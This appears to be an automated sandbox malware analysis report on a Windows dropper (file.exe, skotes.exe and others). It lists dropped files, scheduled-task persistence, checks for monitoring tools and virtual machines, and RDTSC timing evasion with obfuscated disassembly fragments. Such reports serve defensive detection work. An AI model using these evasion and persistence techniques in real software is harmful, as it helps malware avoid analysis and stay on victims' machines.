Source: file.exe Static PE information: section name: sxkyywio
Source: file.exe Static PE information: section name: kanpqnsy
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: sxkyywio
Source: skotes.exe.0.dr Static PE information: section name: kanpqnsy
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: lklnedip
Source: random[1].exe.6.dr Static PE information: section name: cepbmidj
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: 870da04327.exe.6.dr Static PE information: section name:
Source: 870da04327.exe.6.dr Static PE information: section name: .rsrc
Source: 870da04327.exe.6.dr Static PE information: section name: .idata
Source: 870da04327.exe.6.dr Static PE information: section name:
Source: 870da04327.exe.6.dr Static PE information: section name: lklnedip
Source: 870da04327.exe.6.dr Static PE information: section name: cepbmidj
Source: 870da04327.exe.6.dr Static PE information: section name: .taggant
Source: service123.exe.7.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0007D91C push ecx; ret 6_2_0007D92F
Source: file.exe Static PE information: section name: entropy: 7.980623682500333
Source: file.exe Static PE information: section name: sxkyywio entropy: 7.95370667593572
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.980623682500333
Source: skotes.exe.0.dr Static PE information: section name: sxkyywio entropy: 7.95370667593572
Source: random[1].exe.6.dr Static PE information: section name: lklnedip entropy: 7.955611450516285
Source: 870da04327.exe.6.dr Static PE information: section name: lklnedip entropy: 7.955611450516285
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5E94E second address: A5E95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0491DA10Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5E95E second address: A5E963 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCCF6C second address: BCCF7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007FE0491DA106h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCCF7A second address: BCCF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDF49F second address: BDF4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE0491DA114h 0x0000000e jo 00007FE0491DA106h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDF737 second address: BDF752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE048D058A4h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDF752 second address: BDF757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDF757 second address: BDF75D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDF8B6 second address: BDF8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDFD00 second address: BDFD1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FE048D058A1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDFD1B second address: BDFD3F instructions: 0x00000000 rdtsc 0x00000002 js 00007FE0491DA106h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FE0491DA113h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDFD3F second address: BDFD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FE048D05898h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE16C0 second address: BE16C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE16C5 second address: A5E94E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 763DFBC0h 0x00000010 push ebx 0x00000011 adc si, 1363h 0x00000016 pop ecx 0x00000017 push dword ptr [ebp+122D0649h] 0x0000001d jns 00007FE048D058A2h 0x00000023 jo 00007FE048D0589Ch 0x00000029 or edx, dword ptr [ebp+122D2376h] 0x0000002f call dword ptr [ebp+122D2FB6h] 0x00000035 pushad 0x00000036 or dword ptr [ebp+122D242Ch], edi 0x0000003c xor eax, eax 0x0000003e jmp 00007FE048D058A7h 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 pushad 0x00000048 movzx eax, dx 0x0000004b jnc 00007FE048D0589Ch 0x00000051 popad 0x00000052 mov dword ptr [ebp+122D2B82h], eax 0x00000058 sub dword ptr [ebp+122D242Ch], eax 0x0000005e mov esi, 0000003Ch 0x00000063 jmp 00007FE048D058A7h 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c je 00007FE048D0589Ch 0x00000072 sub dword ptr [ebp+122D242Ch], edx 0x00000078 lodsw 0x0000007a pushad 0x0000007b or edi, dword ptr [ebp+122D2B3Eh] 0x00000081 xor dword ptr [ebp+122D2EC1h], ebx 0x00000087 popad 0x00000088 add eax, dword ptr [esp+24h] 0x0000008c stc 0x0000008d clc 0x0000008e mov ebx, dword ptr [esp+24h] 0x00000092 mov dword ptr [ebp+122D242Ch], edi 0x00000098 push eax 0x00000099 push eax 0x0000009a push edx 0x0000009b pushad 0x0000009c push eax 0x0000009d push edx 0x0000009e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE176D second address: BE1771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE1771 second address: BE17F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 39F4FEFDh 0x00000012 mov edi, dword ptr [ebp+122D2AA6h] 0x00000018 call 00007FE048D0589Ah 0x0000001d jmp 00007FE048D0589Ah 0x00000022 pop edi 0x00000023 push 00000003h 0x00000025 mov cx, 33DFh 0x00000029 mov ch, 08h 0x0000002b push 00000000h 0x0000002d cld 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FE048D05898h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov edi, edx 0x0000004c mov dword ptr [ebp+122D2FC0h], eax 0x00000052 call 00007FE048D05899h 0x00000057 jmp 00007FE048D058A5h 0x0000005c push eax 0x0000005d pushad 0x0000005e pushad 0x0000005f jp 00007FE048D05896h 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE17F8 second address: BE180F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FE0491DA106h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE180F second address: BE1836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D0589Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FE048D0589Bh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE1836 second address: BE1866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jns 00007FE0491DA106h 0x0000000f popad 0x00000010 popad 0x00000011 pop eax 0x00000012 jmp 00007FE0491DA10Bh 0x00000017 lea ebx, dword ptr [ebp+1245660Eh] 0x0000001d mov dx, di 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007FE0491DA106h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE1976 second address: BE1A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FE048D05898h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push esi 0x00000015 jmp 00007FE048D0589Ah 0x0000001a pop esi 0x0000001b jmp 00007FE048D0589Eh 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 jmp 00007FE048D058A5h 0x00000029 jnp 00007FE048D0589Ch 0x0000002f popad 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 jmp 00007FE048D058A9h 0x00000039 pop eax 0x0000003a mov di, 1320h 0x0000003e push 00000003h 0x00000040 push edx 0x00000041 jmp 00007FE048D058A1h 0x00000046 pop edx 0x00000047 push 00000000h 0x00000049 mov cl, 97h 0x0000004b push 00000003h 0x0000004d jmp 00007FE048D058A8h 0x00000052 push 613576C2h 0x00000057 pushad 0x00000058 jns 00007FE048D0589Ch 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE1B2B second address: BE1B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 jp 00007FE0491DA10Ch 0x0000000f or ecx, dword ptr [ebp+122D2AC2h] 0x00000015 push 00000000h 0x00000017 jno 00007FE0491DA11Ch 0x0000001d call 00007FE0491DA109h 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007FE0491DA110h 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b popad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE1B7F second address: BE1B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FE048D05898h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE1B92 second address: BE1BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE0491DA10Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE1BB5 second address: BE1BC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jc 00007FE048D058A4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE1BC8 second address: BE1BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C029A5 second address: C029B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE048D0589Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C029B9 second address: C029D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA114h 0x00000007 push edi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00906 second address: C00917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE048D0589Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00B7B second address: C00B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00B7F second address: C00B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00CD1 second address: C00CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA111h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00CE6 second address: C00CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00CF2 second address: C00CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00E4B second address: C00E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00E53 second address: C00E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00E57 second address: C00E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00E68 second address: C00E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00E6C second address: C00E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00E70 second address: C00E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE0491DA106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00FDB second address: C00FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00FE5 second address: C00FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE0491DA106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C01188 second address: C0118C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C01569 second address: C0156D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C016DE second address: C01708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D0589Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007FE048D058AEh 0x00000010 jmp 00007FE048D058A2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF99FE second address: BF9A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9A04 second address: BF9A08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9A08 second address: BF9A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9A12 second address: BF9A25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jo 00007FE048D058AEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9A25 second address: BF9A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9A2B second address: BF9A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9A2F second address: BF9A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD8AE5 second address: BD8B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FE048D058B0h 0x0000000f push ecx 0x00000010 jmp 00007FE048D058A2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C022CC second address: C022D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C022D0 second address: C022D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C022D4 second address: C022E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ebx 0x00000008 jnp 00007FE0491DA10Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C027F6 second address: C027FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C027FA second address: C02818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0491DA115h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C07D08 second address: C07D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C081B6 second address: C081BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0E2AC second address: C0E2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FE048D058A1h 0x0000000b popad 0x0000000c rdtsc
